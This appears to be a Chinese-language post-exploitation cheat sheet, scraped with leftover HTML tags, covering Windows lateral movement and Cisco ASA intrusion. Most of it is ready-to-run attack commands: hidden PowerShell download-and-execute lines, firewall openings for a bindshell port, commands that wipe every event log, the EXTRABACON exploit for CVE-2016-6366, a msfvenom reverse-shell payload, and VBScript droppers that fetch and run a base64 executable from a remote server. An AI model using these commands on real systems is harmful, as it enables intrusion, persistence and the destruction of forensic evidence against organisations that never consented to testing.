后渗透测试技术详解<\/h1>

0x01 后渗透测试概述<\/h2>

后渗透是渗透测试的关键组成部分，是将自己与普通黑客区分开来的关键阶段。在后渗透阶段，您需要：<\/p>

针对特定系统进行深入分析<\/li>
识别关键基础设施<\/li>
定位企业最重视的信息或数据<\/li>

展示对业务有最大影响的攻击路径<\/li> <\/ul>

后渗透需要您：<\/p>

了解各系统功能及不同用户角色<\/li>
思考如何利用已获取的权限造成最大影响（如财务系统、知识产权等）<\/li>

像恶意攻击者一样思考：具有创造性、快速适应、依靠智慧而非自动化工具<\/li> <\/ol>

0x02 远程管理技术<\/h2>

Windows远程管理命令<\/h3>

命令<\/th> 描述<\/th> <\/tr> <\/thead>

NET USE \\ip\ipc$ password \/user:username<\/code><\/td> 建立IPC连接<\/td> <\/tr>

NET USE z: \\ip\share$ password \/user:username<\/code><\/td> 映射远程共享为本地驱动器<\/td> <\/tr>

systeminfo \/S ComputerName \/U username \/P password<\/code><\/td> 查看远程系统信息<\/td> <\/tr>

tasklist \/S SERVER \/U DOMAIN\username \/P password<\/code><\/td> 查看远程进程列表<\/td> <\/tr>

taskkill \/S SERVER \/U DOMAIN\username \/P password<\/code><\/td> 终止远程进程<\/td> <\/tr>

powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http:\/\/ip:port\/[file]'))"<\/code><\/td> 远程执行代码<\/td> <\/tr>

powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http:\/\/ip:port\/file', 'C:\Windows\temp\testfile')"<\/code><\/td> 远程下载文件<\/td> <\/tr>

bitsadmin \/transfer systemrepair \/download \/priority normal http:\/\/path\/to\/file c:\path\local\file<\/code><\/td> 使用BITS服务下载文件<\/td> <\/tr>

PsExec.exe \\192.168.206.145 -accepteula -u username -p password cmd.exe \/c ver<\/code><\/td>

远程执行命令并返回结果<\/td> <\/tr> <\/tbody> <\/table>

代理设置<\/h3>

set<\/span> http_proxy=http:\/\/your_proxy:your_port
<\/span><\/span>set<\/span> http_proxy=http:\/\/username:password@your_proxy:your_port
<\/span><\/span>set<\/span> https_proxy=https:\/\/your_proxy:your_port
<\/span><\/span>set<\/span> https_proxy=https:\/\/username:password@your_proxy:your_port
<\/span><\/span><\/code><\/pre>端口转发<\/h3>
NETSH INTERFACE portproxy add v4tov4 listenport=LPORT connectaddress=RHOST connectport=RPORT [listenaddress=LHOST protocol=tcp]
<\/span><\/span><\/code><\/pre>0x03 白名单绕过技术<\/h2>
防火墙白名单操作<\/h3>



命令<\/th>
描述<\/th>
<\/tr>
<\/thead>


NETSH FIREWALL show all<\/code><\/td>
显示允许的程序配置<\/td>
<\/tr>

NETSH FIREWALL add allowedprogram C:\Windows\system32\cmd.exe cmd enable<\/code><\/td>
添加程序到白名单<\/td>
<\/tr>

NETSH FIREWALL delete allowedprogram cmd<\/code><\/td>
从白名单删除程序<\/td>
<\/tr>

NETSH FIREWALL add portopening tcp 4444 bindshell enable all<\/code><\/td>
添加端口到白名单<\/td>
<\/tr>
<\/tbody>
<\/table>
0x04 服务与计划任务<\/h2>
服务创建<\/h3>
sc create servicename type= own type= interact binPath= "c:\windows\system32\cmd.exe \/c cmd.exe"<\/span> & sc start servicename
<\/span><\/span><\/code><\/pre>计划任务<\/h3>
net use \\IP\ipc$ password \/user:username
<\/span><\/span>at \\ComputerName time "command"<\/span>
<\/span><\/span>net time [\/domain]
<\/span><\/span><\/code><\/pre>0x05 日志清理<\/h2>
del<\/span> %WINDIR%\*.log \/a \/s \/q \/f
<\/span><\/span>wevtutil el  # 列出日志文件
<\/span><\/span>for<\/span> \/f<\/span> %a in ('wevtutil el') do @wevtutil cl "%a"  # 清除所有日志<\/span>
<\/span><\/span>powershell.exe -ep bypass -w hidden -c Clear-Eventlog -Log Application, System, Security
<\/span><\/span><\/code><\/pre>0x06 Cisco ASA设备渗透<\/h2>
CVE-2016-6366漏洞利用<\/h3>
漏洞描述<\/strong>：<\/p>

影响所有版本的SNMP（v1, v2c, v3）<\/li>
缓冲区溢出漏洞<\/li>
需要知道SNMP字符串<\/li>
仅影响以路由和透明防火墙模式配置的系统<\/li>
<\/ul>
利用步骤<\/strong>：<\/p>


使用SNMP登录模块验证凭据：<\/p>
use auxiliary\/scanner\/snmp\/snmp_login
set PASSWORD public
set RHOSTS 192.168.206.114
run
<\/code><\/pre>
<\/li>

使用漏洞利用模块：<\/p>
use auxiliary\/admin\/cisco\/cisco_asa_extrabacon
set COMMUNITY public
set MODE pass-disable
set RHOST 192.168.206.114
run
<\/code><\/pre>
<\/li>

成功后通过telnet无密码登录：<\/p>
telnet 192.168.206.114
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
Cisco ASA基本操作<\/h3>


查看版本信息：<\/p>
show version
<\/code><\/pre>
<\/li>

进入特权模式（通常密码为空）：<\/p>
enable
<\/code><\/pre>
<\/li>

配置接口IP：<\/p>
configure terminal
interface GigabitEthernet 0\/0
ip address 192.168.206.114 255.255.255.0
no shutdown
exit
<\/code><\/pre>
<\/li>

启用SNMP服务：<\/p>
snmp-server host inside 192.168.206.1 community 0 public
<\/code><\/pre>
<\/li>

启用SSH服务：<\/p>
username admin password password
aaa authentication ssh console LOCAL
passwd password
crypto key generate rsa modulus 1024
ssh 192.168.206.1 255.255.255.0 inside
ssh version 2
<\/code><\/pre>
<\/li>

启用Telnet服务：<\/p>
aaa authentication telnet console LOCAL
telnet 0.0.0.0 0.0.0.0 inside
<\/code><\/pre>
<\/li>
<\/ol>
0x07 Windows Active Directory渗透<\/h2>
在cmd shell中执行Metasploit payload<\/h3>


生成VBS格式的payload：<\/p>
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span>192.168.1.100 LPORT=<\/span>4444<\/span> -f vbs --arch x86 --platform win
<\/span><\/span><\/code><\/pre><\/li>

创建执行脚本msf.vbs：<\/p>
echo<\/span> shellcode = WScript.Arguments.Item(0):strXML = ""<\/span> & shellcode & ""<\/span>:Set oXMLDoc = CreateObject("MSXML2.DOMDocument.3.0"<\/span>):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode("B64DECODE"<\/span>).nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject("Scripting.FileSystemObject"<\/span>):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir & "\"<\/span> & fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir & "\test.exe"<\/span>:Dim adodbstream:Set adodbstream = CreateObject("ADODB.Stream"<\/span>):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject("Wscript.Shell"<\/span>):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir) > %TEMP%\msf.vbs
<\/span><\/span><\/code><\/pre><\/li>

执行payload：<\/p>
cscript.exe %TEMP%\msf.vbs <base64_encoded_payload>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
绕过nc shell缓冲区限制<\/h3>
对于较大的payload，可以使用远程加载方式：<\/p>


创建下载执行的vbs脚本：<\/p>
echo<\/span> strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"<\/span>):objXMLHTTP.open "GET"<\/span>, strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ""<\/span> & shellcode & ""<\/span>:Set oXMLDoc = CreateObject("MSXML2.DOMDocument.3.0"<\/span>):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode("B64DECODE"<\/span>).nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject("Scripting.FileSystemObject"<\/span>):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir & "\"<\/span> & fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir & "\test.exe"<\/span>:Dim adodbstream:Set adodbstream = CreateObject("ADODB.Stream"<\/span>):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject("Wscript.Shell"<\/span>):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs
<\/span><\/span><\/code><\/pre><\/li>

从远程服务器加载执行：<\/p>
START<\/span> \/B cscript.exe %TEMP%\msf.vbs http:\/\/192.168.1.100:8080\/payload.txt
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
参考资源<\/h2>

Cisco ASA SNMP漏洞公告<\/a><\/li>
Cisco ASA配置指南<\/a><\/li>
VBScript解码Base64<\/a><\/li>
绕过应用白名单<\/a><\/li>
Metasploit框架<\/a><\/li>
<\/ol>

后渗透测试技术详解<\/h1>

0x02 远程管理技术<\/h2>

0x03 白名单绕过技术<\/h2>

0x04 服务与计划任务<\/h2>

0x06 Cisco ASA设备渗透<\/h2>

0x07 Windows Active Directory渗透<\/h2>

参考资源<\/h2> Cisco ASA SNMP漏洞公告<\/a><\/li> Cisco ASA配置指南<\/a><\/li> VBScript解码Base64<\/a><\/li> 绕过应用白名单<\/a><\/li> Metasploit框架<\/a><\/li> <\/ol>

参考资源<\/h2>

Cisco ASA SNMP漏洞公告<\/a><\/li>
Cisco ASA配置指南<\/a><\/li>
VBScript解码Base64<\/a><\/li>
绕过应用白名单<\/a><\/li>
Metasploit框架<\/a><\/li> <\/ol>